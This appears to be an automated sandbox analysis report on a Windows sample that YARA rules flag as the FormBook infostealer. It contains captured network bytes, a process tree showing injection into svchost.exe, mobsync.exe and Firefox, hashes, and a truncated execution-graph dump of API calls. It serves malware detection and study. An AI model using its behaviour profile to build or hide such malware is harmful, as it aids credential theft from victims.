                                        server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                        Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED]
                                        Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <di
                                        Jan 10, 2025 23:58:02.849045992 CET888INData Raw: 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20
                                        Data Ascii: v style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">N


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:17:57:22
                                        Start date:10/01/2025
                                        Path:C:\Users\user\Desktop\Gz2FxKx2cM.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                                        Imagebase:0x900000
                                        File size:1'211'904 bytes
                                        MD5 hash:F0483EFD3C238F3181609C3AA40FDAC6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:17:57:25
                                        Start date:10/01/2025
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                                        Imagebase:0x390000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:17:57:40
                                        Start date:10/01/2025
                                        Path:C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe"
                                        Imagebase:0x850000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:7
                                        Start time:17:57:41
                                        Start date:10/01/2025
                                        Path:C:\Windows\SysWOW64\mobsync.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                        Imagebase:0x210000
                                        File size:93'696 bytes
                                        MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:17:57:55
                                        Start date:10/01/2025
                                        Path:C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe"
                                        Imagebase:0x850000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:9
                                        Start time:17:58:07
                                        Start date:10/01/2025
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:3.6%
                                          Dynamic/Decrypted Code Coverage:1.5%
                                          Signature Coverage:8.3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:165
                                          execution_graph 104254 903633 104255 90366a 104254->104255 104256 9036e7 104255->104256 104257 903688 104255->104257 104295 9036e5 104255->104295 104259 9036ed 104256->104259 104260 93d0cc 104256->104260 104261 903695 104257->104261 104262 90374b PostQuitMessage 104257->104262 104258 9036ca DefWindowProcW 104268 9036d8 104258->104268 104263 9036f2 104259->104263 104264 903715 SetTimer RegisterWindowMessageW 104259->104264 104309 911070 10 API calls Mailbox 104260->104309 104266 9036a0 104261->104266 104267 93d154 104261->104267 104262->104268 104269 9036f9 KillTimer 104263->104269 104270 93d06f 104263->104270 104264->104268 104272 90373e CreatePopupMenu 104264->104272 104273 903755 104266->104273 104274 9036a8 104266->104274 104325 962527 71 API calls _memset 104267->104325 104306 90443a Shell_NotifyIconW _memset 104269->104306 104276 93d074 104270->104276 104277 93d0a8 MoveWindow 104270->104277 104271 93d0f3 104310 911093 331 API calls Mailbox 104271->104310 104272->104268 104299 9044a0 104273->104299 104280 9036b3 104274->104280 104281 93d139 104274->104281 104284 93d097 SetFocus 104276->104284 104285 93d078 104276->104285 104277->104268 104287 9036be 104280->104287 104288 93d124 104280->104288 104281->104258 104324 957c36 59 API calls Mailbox 104281->104324 104282 93d166 104282->104258 104282->104268 104284->104268 104285->104287 104289 93d081 104285->104289 104286 90370c 104307 903114 DeleteObject DestroyWindow Mailbox 104286->104307 104287->104258 104311 90443a Shell_NotifyIconW _memset 104287->104311 104323 962d36 81 API calls _memset 104288->104323 104308 911070 10 API calls Mailbox 104289->104308 104294 93d134 104294->104268 104295->104258 104297 93d118 104312 90434a 104297->104312 104300 9044b7 _memset 104299->104300 104301 904539 104299->104301 104326 90407c 104300->104326 104301->104268 104303 904522 KillTimer SetTimer 104303->104301 104304 9044de 104304->104303 104305 93d4ab Shell_NotifyIconW 104304->104305 104305->104303 104306->104286 104307->104268 104308->104268 104309->104271 104310->104287 104311->104297 104313 904375 _memset 104312->104313 104445 904182 104313->104445 104316 9043fa 104318 904430 Shell_NotifyIconW 104316->104318 104319 904414 Shell_NotifyIconW 104316->104319 104320 904422 104318->104320 104319->104320 104321 90407c 61 API calls 104320->104321 104322 904429 104321->104322 104322->104295 104323->104294 104324->104295 104325->104282 104327 904098 104326->104327 104347 90416f Mailbox 104326->104347 104348 907a16 104327->104348 104330 9040b3 104353 907bcc 104330->104353 104331 93d3c8 LoadStringW 104334 93d3e2 104331->104334 104333 9040c8 104333->104334 104335 9040d9 104333->104335 104336 907b2e 59 API calls 104334->104336 104337 9040e3 104335->104337 104338 904174 104335->104338 104341 93d3ec 104336->104341 104362 907b2e 104337->104362 104371 908047 104338->104371 104342 9040ed _memset _wcscpy 104341->104342 104375 907cab 104341->104375 104345 904155 Shell_NotifyIconW 104342->104345 104344 93d40e 104346 907cab 59 API calls 104344->104346 104345->104347 104346->104342 104347->104304 104382 920db6 104348->104382 104350 907a3b 104392 908029 104350->104392 104354 907c45 104353->104354 104355 907bd8 __wsetenvp 104353->104355 104424 907d2c 104354->104424 104357 907c13 104355->104357 104358 907bee 104355->104358 104359 908029 59 API calls 104357->104359 104423 907f27 59 API calls Mailbox 104358->104423 104361 907bf6 _memmove 104359->104361 104361->104333 104363 907b40 104362->104363 104364 93ec6b 104362->104364 104432 907a51 104363->104432 104438 957bdb 59 API calls _memmove 104364->104438 104367 907b4c 104367->104342 104368 93ec75 104369 908047 59 API calls 104368->104369 104370 93ec7d Mailbox 104369->104370 104372 908052 104371->104372 104373 90805a 104371->104373 104439 907f77 59 API calls 2 library calls 104372->104439 104373->104342 104376 93ed4a 104375->104376 104377 907cbf 104375->104377 104378 908029 59 API calls 104376->104378 104440 907c50 104377->104440 104381 93ed55 __wsetenvp _memmove 104378->104381 104380 907cca 104380->104344 104386 920dbe 104382->104386 104384 920dd8 104384->104350 104386->104384 104387 920ddc std::exception::exception 104386->104387 104395 92571c 104386->104395 104412 9233a1 DecodePointer 104386->104412 104413 92859b RaiseException 104387->104413 104389 920e06 104414 9284d1 58 API calls _free 104389->104414 104391 920e18 104391->104350 104393 920db6 Mailbox 59 API calls 104392->104393 104394 9040a6 104393->104394 104394->104330 104394->104331 104396 925797 104395->104396 104406 925728 104395->104406 104421 9233a1 DecodePointer 104396->104421 104398 92579d 104422 928b28 58 API calls __getptd_noexit 104398->104422 104401 92575b RtlAllocateHeap 104402 92578f 104401->104402 104401->104406 104402->104386 104404 925733 104404->104406 104415 92a16b 58 API calls 2 library calls 104404->104415 104416 92a1c8 58 API calls 7 library calls 104404->104416 104417 92309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104404->104417 104405 925783 104419 928b28 58 API calls __getptd_noexit 104405->104419 104406->104401 104406->104404 104406->104405 104410 925781 104406->104410 104418 9233a1 DecodePointer 104406->104418 104420 928b28 58 API calls __getptd_noexit 104410->104420 104412->104386 104413->104389 104414->104391 104415->104404 104416->104404 104418->104406 104419->104410 104420->104402 104421->104398 104422->104402 104423->104361 104425 907d43 _memmove 104424->104425 104426 907d3a 104424->104426 104425->104361 104426->104425 104428 907e4f 104426->104428 104429 907e62 104428->104429 104431 907e5f _memmove 104428->104431 104430 920db6 Mailbox 59 API calls 104429->104430 104430->104431 104431->104425 104433 907a5f 104432->104433 104435 907a85 _memmove 104432->104435 104434 920db6 Mailbox 59 API calls 104433->104434 104433->104435 104436 907ad4 104434->104436 104435->104367 104437 920db6 Mailbox 59 API calls 104436->104437 104437->104435 104438->104368 104439->104373 104441 907c5f __wsetenvp 104440->104441 104442 908029 59 API calls 104441->104442 104443 907c70 _memmove 104441->104443 104444 93ed07 _memmove 104442->104444 104443->104380 104446 93d423 104445->104446 104447 904196 104445->104447 104446->104447 104448 93d42c DestroyIcon 104446->104448 104447->104316 104449 962f94 62 API calls _W_store_winword 104447->104449 104448->104447 104449->104316 104450 927c56 104451 927c62 __close 104450->104451 104487 929e08 GetStartupInfoW 104451->104487 104453 927c67 104489 928b7c GetProcessHeap 104453->104489 104455 927cbf 104456 927cca 104455->104456 104572 927da6 58 API calls 3 library calls 104455->104572 104490 929ae6 104456->104490 104459 927cd0 104460 927cdb __RTC_Initialize 104459->104460 104573 927da6 58 API calls 3 library calls 104459->104573 104511 92d5d2 104460->104511 104463 927cea 104464 927cf6 GetCommandLineW 104463->104464 104574 927da6 58 API calls 3 library calls 104463->104574 104530 934f23 GetEnvironmentStringsW 104464->104530 104467 927cf5 104467->104464 104470 927d10 104471 927d1b 104470->104471 104575 9230b5 58 API calls 3 library calls 104470->104575 104540 934d58 104471->104540 104474 927d21 104477 927d2c 104474->104477 104576 9230b5 58 API calls 3 library calls 104474->104576 104554 9230ef 104477->104554 104478 927d34 104479 927d3f __wwincmdln 104478->104479 104577 9230b5 58 API calls 3 library calls 104478->104577 104560 9047d0 104479->104560 104482 927d53 104483 927d62 104482->104483 104578 923358 58 API calls _doexit 104482->104578 104579 9230e0 58 API calls _doexit 104483->104579 104486 927d67 __close 104488 929e1e 104487->104488 104488->104453 104489->104455 104580 923187 36 API calls 2 library calls 104490->104580 104492 929aeb 104581 929d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 104492->104581 104494 929af0 104495 929af4 104494->104495 104583 929d8a TlsAlloc 104494->104583 104582 929b5c 61 API calls 2 library calls 104495->104582 104498 929b06 104498->104495 104500 929b11 104498->104500 104499 929af9 104499->104459 104584 9287d5 104500->104584 104503 929b53 104592 929b5c 61 API calls 2 library calls 104503->104592 104506 929b32 104506->104503 104508 929b38 104506->104508 104507 929b58 104507->104459 104591 929a33 58 API calls 4 library calls 104508->104591 104510 929b40 GetCurrentThreadId 104510->104459 104512 92d5de __close 104511->104512 104604 929c0b 104512->104604 104514 92d5e5 104515 9287d5 __calloc_crt 58 API calls 104514->104515 104516 92d5f6 104515->104516 104517 92d661 GetStartupInfoW 104516->104517 104518 92d601 __close @_EH4_CallFilterFunc@8 104516->104518 104519 92d676 104517->104519 104520 92d7a5 104517->104520 104518->104463 104519->104520 104523 9287d5 __calloc_crt 58 API calls 104519->104523 104525 92d6c4 104519->104525 104521 92d86d 104520->104521 104524 92d7f2 GetStdHandle 104520->104524 104526 92d805 GetFileType 104520->104526 104612 929e2b InitializeCriticalSectionAndSpinCount 104520->104612 104613 92d87d LeaveCriticalSection _doexit 104521->104613 104523->104519 104524->104520 104525->104520 104527 92d6f8 GetFileType 104525->104527 104611 929e2b InitializeCriticalSectionAndSpinCount 104525->104611 104526->104520 104527->104525 104531 934f34 104530->104531 104532 927d06 104530->104532 104653 92881d 58 API calls __malloc_crt 104531->104653 104536 934b1b GetModuleFileNameW 104532->104536 104534 934f5a _memmove 104535 934f70 FreeEnvironmentStringsW 104534->104535 104535->104532 104537 934b4f _wparse_cmdline 104536->104537 104539 934b8f _wparse_cmdline 104537->104539 104654 92881d 58 API calls __malloc_crt 104537->104654 104539->104470 104541 934d71 __wsetenvp 104540->104541 104545 934d69 104540->104545 104542 9287d5 __calloc_crt 58 API calls 104541->104542 104550 934d9a __wsetenvp 104542->104550 104543 934df1 104544 922d55 _free 58 API calls 104543->104544 104544->104545 104545->104474 104546 9287d5 __calloc_crt 58 API calls 104546->104550 104547 934e16 104548 922d55 _free 58 API calls 104547->104548 104548->104545 104550->104543 104550->104545 104550->104546 104550->104547 104551 934e2d 104550->104551 104655 934607 58 API calls 2 library calls 104550->104655 104656 928dc6 IsProcessorFeaturePresent 104551->104656 104553 934e39 104553->104474 104555 9230fb __IsNonwritableInCurrentImage 104554->104555 104679 92a4d1 104555->104679 104557 923119 __initterm_e 104559 923138 __cinit __IsNonwritableInCurrentImage 104557->104559 104682 922d40 104557->104682 104559->104478 104561 9047ea 104560->104561 104571 904889 104560->104571 104562 904824 IsThemeActive 104561->104562 104717 92336c 104562->104717 104566 904850 104729 9048fd SystemParametersInfoW SystemParametersInfoW 104566->104729 104568 90485c 104730 903b3a 104568->104730 104570 904864 SystemParametersInfoW 104570->104571 104571->104482 104572->104456 104573->104460 104574->104467 104578->104483 104579->104486 104580->104492 104581->104494 104582->104499 104583->104498 104585 9287dc 104584->104585 104587 928817 104585->104587 104589 9287fa 104585->104589 104593 9351f6 104585->104593 104587->104503 104590 929de6 TlsSetValue 104587->104590 104589->104585 104589->104587 104601 92a132 Sleep 104589->104601 104590->104506 104591->104510 104592->104507 104594 935201 104593->104594 104596 93521c 104593->104596 104595 93520d 104594->104595 104594->104596 104602 928b28 58 API calls __getptd_noexit 104595->104602 104598 93522c HeapAlloc 104596->104598 104599 935212 104596->104599 104603 9233a1 DecodePointer 104596->104603 104598->104596 104598->104599 104599->104585 104601->104589 104602->104599 104603->104596 104605 929c2f EnterCriticalSection 104604->104605 104606 929c1c 104604->104606 104605->104514 104614 929c93 104606->104614 104608 929c22 104608->104605 104638 9230b5 58 API calls 3 library calls 104608->104638 104611->104525 104612->104520 104613->104518 104615 929c9f __close 104614->104615 104616 929cc0 104615->104616 104617 929ca8 104615->104617 104630 929ce1 __close 104616->104630 104642 92881d 58 API calls __malloc_crt 104616->104642 104639 92a16b 58 API calls 2 library calls 104617->104639 104620 929cad 104640 92a1c8 58 API calls 7 library calls 104620->104640 104621 929cd5 104623 929ceb 104621->104623 104624 929cdc 104621->104624 104628 929c0b __lock 58 API calls 104623->104628 104643 928b28 58 API calls __getptd_noexit 104624->104643 104625 929cb4 104641 92309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104625->104641 104631 929cf2 104628->104631 104630->104608 104632 929d17 104631->104632 104633 929cff 104631->104633 104645 922d55 104632->104645 104644 929e2b InitializeCriticalSectionAndSpinCount 104633->104644 104636 929d0b 104651 929d33 LeaveCriticalSection _doexit 104636->104651 104639->104620 104640->104625 104642->104621 104643->104630 104644->104636 104646 922d87 __dosmaperr 104645->104646 104647 922d5e RtlFreeHeap 104645->104647 104646->104636 104647->104646 104648 922d73 104647->104648 104652 928b28 58 API calls __getptd_noexit 104648->104652 104650 922d79 GetLastError 104650->104646 104651->104630 104652->104650 104653->104534 104654->104539 104655->104550 104657 928dd1 104656->104657 104662 928c59 104657->104662 104661 928dec 104661->104553 104663 928c73 _memset __call_reportfault 104662->104663 104664 928c93 IsDebuggerPresent 104663->104664 104670 92a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104664->104670 104667 928d57 __call_reportfault 104671 92c5f6 104667->104671 104668 928d7a 104669 92a140 GetCurrentProcess TerminateProcess 104668->104669 104669->104661 104670->104667 104672 92c600 IsProcessorFeaturePresent 104671->104672 104673 92c5fe 104671->104673 104675 93590a 104672->104675 104673->104668 104678 9358b9 5 API calls 2 library calls 104675->104678 104677 9359ed 104677->104668 104678->104677 104680 92a4d4 EncodePointer 104679->104680 104680->104680 104681 92a4ee 104680->104681 104681->104557 104685 922c44 104682->104685 104684 922d4b 104684->104559 104686 922c50 __close 104685->104686 104693 923217 104686->104693 104692 922c77 __close 104692->104684 104694 929c0b __lock 58 API calls 104693->104694 104695 922c59 104694->104695 104696 922c88 DecodePointer DecodePointer 104695->104696 104697 922c65 104696->104697 104698 922cb5 104696->104698 104707 922c82 104697->104707 104698->104697 104710 9287a4 59 API calls 2 library calls 104698->104710 104700 922d18 EncodePointer EncodePointer 104700->104697 104701 922cc7 104701->104700 104703 922cec 104701->104703 104711 928864 61 API calls 2 library calls 104701->104711 104703->104697 104705 922d06 EncodePointer 104703->104705 104712 928864 61 API calls 2 library calls 104703->104712 104705->104700 104706 922d00 104706->104697 104706->104705 104713 923220 104707->104713 104710->104701 104711->104703 104712->104706 104716 929d75 LeaveCriticalSection 104713->104716 104715 922c87 104715->104692 104716->104715 104718 929c0b __lock 58 API calls 104717->104718 104719 923377 DecodePointer EncodePointer 104718->104719 104782 929d75 LeaveCriticalSection 104719->104782 104721 904849 104722 9233d4 104721->104722 104723 9233f8 104722->104723 104724 9233de 104722->104724 104723->104566 104724->104723 104783 928b28 58 API calls __getptd_noexit 104724->104783 104726 9233e8 104784 928db6 9 API calls __write_nolock 104726->104784 104728 9233f3 104728->104566 104729->104568 104731 903b47 __write_nolock 104730->104731 104785 907667 104731->104785 104735 903b7a IsDebuggerPresent 104736 93d272 MessageBoxA 104735->104736 104737 903b88 104735->104737 104740 93d28c 104736->104740 104738 903c61 104737->104738 104737->104740 104741 903ba5 104737->104741 104739 903c68 SetCurrentDirectoryW 104738->104739 104744 903c75 Mailbox 104739->104744 104989 907213 59 API calls Mailbox 104740->104989 104871 907285 104741->104871 104744->104570 104746 903bc3 GetFullPathNameW 104747 907bcc 59 API calls 104746->104747 104749 903bfe 104747->104749 104748 93d29c 104750 93d2b2 SetCurrentDirectoryW 104748->104750 104887 91092d 104749->104887 104750->104744 104753 903c1c 104754 903c26 104753->104754 104990 95874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104753->104990 104903 903a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104754->104903 104758 93d2cf 104758->104754 104761 93d2e0 104758->104761 104760 903c30 104763 903c43 104760->104763 104765 90434a 68 API calls 104760->104765 104991 904706 104761->104991 104911 9109d0 104763->104911 104764 93d2e8 104998 907de1 104764->104998 104765->104763 104768 903c4e 104768->104738 104988 90443a Shell_NotifyIconW _memset 104768->104988 104769 93d2f5 104770 93d324 104769->104770 104771 93d2ff 104769->104771 104774 907cab 59 API calls 104770->104774 104773 907cab 59 API calls 104771->104773 104775 93d30a 104773->104775 104776 93d320 GetForegroundWindow ShellExecuteW 104774->104776 104777 907b2e 59 API calls 104775->104777 104780 93d354 Mailbox 104776->104780 104779 93d317 104777->104779 104780->104738 104782->104721 104783->104726 104784->104728 104786 920db6 Mailbox 59 API calls 104785->104786 104787 907688 104786->104787 104788 920db6 Mailbox 59 API calls 104787->104788 104789 903b51 GetCurrentDirectoryW 104788->104789 104790 903766 104789->104790 104791 907667 59 API calls 104790->104791 104792 90377c 104791->104792 105002 903d31 104792->105002 104794 90379a 104795 904706 61 API calls 104794->104795 104796 9037ae 104795->104796 104797 907de1 59 API calls 104796->104797 104798 9037bb 104797->104798 105016 904ddd 104798->105016 104801 93d173 105083 96955b 104801->105083 104802 9037dc Mailbox 104806 908047 59 API calls 104802->104806 104805 93d192 104808 922d55 _free 58 API calls 104805->104808 104809 9037ef 104806->104809 104811 93d19f 104808->104811 105040 90928a 104809->105040 104812 904e4a 84 API calls 104811->104812 104814 93d1a8 104812->104814 104818 903ed0 59 API calls 104814->104818 104815 907de1 59 API calls 104816 903808 104815->104816 105043 9084c0 104816->105043 104820 93d1c3 104818->104820 104819 90381a Mailbox 104821 907de1 59 API calls 104819->104821 104822 903ed0 59 API calls 104820->104822 104823 903840 104821->104823 104824 93d1df 104822->104824 104825 9084c0 69 API calls 104823->104825 104826 904706 61 API calls 104824->104826 104828 90384f Mailbox 104825->104828 104827 93d204 104826->104827 104829 903ed0 59 API calls 104827->104829 104830 907667 59 API calls 104828->104830 104831 93d210 104829->104831 104833 90386d 104830->104833 104832 908047 59 API calls 104831->104832 104834 93d21e 104832->104834 105047 903ed0 104833->105047 104836 903ed0 59 API calls 104834->104836 104840 93d22d 104836->104840 104839 903887 104839->104814 104841 903891 104839->104841 104844 908047 59 API calls 104840->104844 104842 922efd _W_store_winword 60 API calls 104841->104842 104843 90389c 104842->104843 104843->104820 104845 9038a6 104843->104845 104846 93d24f 104844->104846 104847 922efd _W_store_winword 60 API calls 104845->104847 104848 903ed0 59 API calls 104846->104848 104849 9038b1 104847->104849 104850 93d25c 104848->104850 104849->104824 104851 9038bb 104849->104851 104850->104850 104852 922efd _W_store_winword 60 API calls 104851->104852 104853 9038c6 104852->104853 104853->104840 104854 903907 104853->104854 104856 903ed0 59 API calls 104853->104856 104854->104840 104855 903914 104854->104855 105063 9092ce 104855->105063 104857 9038ea 104856->104857 104859 908047 59 API calls 104857->104859 104861 9038f8 104859->104861 104863 903ed0 59 API calls 104861->104863 104863->104854 104866 90928a 59 API calls 104868 90394f 104866->104868 104867 908ee0 60 API calls 104867->104868 104868->104866 104868->104867 104869 903ed0 59 API calls 104868->104869 104870 903995 Mailbox 104868->104870 104869->104868 104870->104735 104872 907292 __write_nolock 104871->104872 104873 93ea22 _memset 104872->104873 104874 9072ab 104872->104874 104877 93ea3e GetOpenFileNameW 104873->104877 105711 904750 104874->105711 104879 93ea8d 104877->104879 104880 907bcc 59 API calls 104879->104880 104882 93eaa2 104880->104882 104882->104882 104884 9072c9 105739 90686a 104884->105739 104888 91093a __write_nolock 104887->104888 106000 906d80 104888->106000 104890 91093f 104902 903c14 104890->104902 106011 91119e 89 API calls 104890->106011 104892 91094c 104892->104902 106012 913ee7 91 API calls Mailbox 104892->106012 104894 910955 104895 910959 GetFullPathNameW 104894->104895 104894->104902 104896 907bcc 59 API calls 104895->104896 104897 910985 104896->104897 104898 907bcc 59 API calls 104897->104898 104899 910992 104898->104899 104900 944cab _wcscat 104899->104900 104901 907bcc 59 API calls 104899->104901 104901->104902 104902->104748 104902->104753 104904 903ab0 LoadImageW RegisterClassExW 104903->104904 104905 93d261 104903->104905 106045 903041 7 API calls 104904->106045 106046 9047a0 LoadImageW EnumResourceNamesW 104905->106046 104908 93d26a 104909 903b34 104910 9039d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104909->104910 104910->104760 104912 944cc3 104911->104912 104925 9109f5 104911->104925 106186 969e4a 89 API calls 4 library calls 104912->106186 104914 910cfa 104914->104768 104917 910ee4 104917->104914 104919 910ef1 104917->104919 104918 910a4b PeekMessageW 104987 910a05 Mailbox 104918->104987 106184 911093 331 API calls Mailbox 104919->106184 104922 910ef8 LockWindowUpdate DestroyWindow GetMessageW 104922->104914 104923 910f2a 104922->104923 104927 945c58 TranslateMessage DispatchMessageW GetMessageW 104923->104927 104924 910ce4 104924->104914 106183 911070 10 API calls Mailbox 104924->106183 104925->104987 106187 909e5d 60 API calls 104925->106187 106188 956349 331 API calls 104925->106188 104926 944e81 Sleep 104926->104987 104927->104927 104929 945c88 104927->104929 104929->104914 104930 944d50 TranslateAcceleratorW 104932 910e43 PeekMessageW 104930->104932 104930->104987 104931 909e5d 60 API calls 104931->104987 104932->104987 104933 910ea5 TranslateMessage DispatchMessageW 104933->104932 104934 94581f WaitForSingleObject 104937 94583c GetExitCodeProcess CloseHandle 104934->104937 104934->104987 104936 910d13 timeGetTime 104936->104987 104971 910f95 104937->104971 104938 910e5f Sleep 104972 910e70 Mailbox 104938->104972 104939 908047 59 API calls 104939->104987 104940 907667 59 API calls 104940->104972 104941 945af8 Sleep 104941->104972 104943 920db6 59 API calls Mailbox 104943->104987 104945 910f4e timeGetTime 106185 909e5d 60 API calls 104945->106185 104946 92049f timeGetTime 104946->104972 104949 945b8f GetExitCodeProcess 104952 945ba5 WaitForSingleObject 104949->104952 104953 945bbb CloseHandle 104949->104953 104951 90b7dd 109 API calls 104951->104972 104952->104953 104952->104987 104953->104972 104956 985f25 110 API calls 104956->104972 104957 945874 104957->104971 104958 945078 Sleep 104958->104987 104959 945c17 Sleep 104959->104987 104961 907de1 59 API calls 104961->104972 104965 909ea0 304 API calls 104965->104987 104971->104768 104972->104940 104972->104946 104972->104949 104972->104951 104972->104956 104972->104957 104972->104958 104972->104959 104972->104961 104972->104971 104972->104987 106213 962408 60 API calls 104972->106213 106214 909e5d 60 API calls 104972->106214 106215 9089b3 69 API calls Mailbox 104972->106215 106216 90b73c 331 API calls 104972->106216 106217 9564da 60 API calls 104972->106217 106218 965244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104972->106218 106219 963c55 66 API calls Mailbox 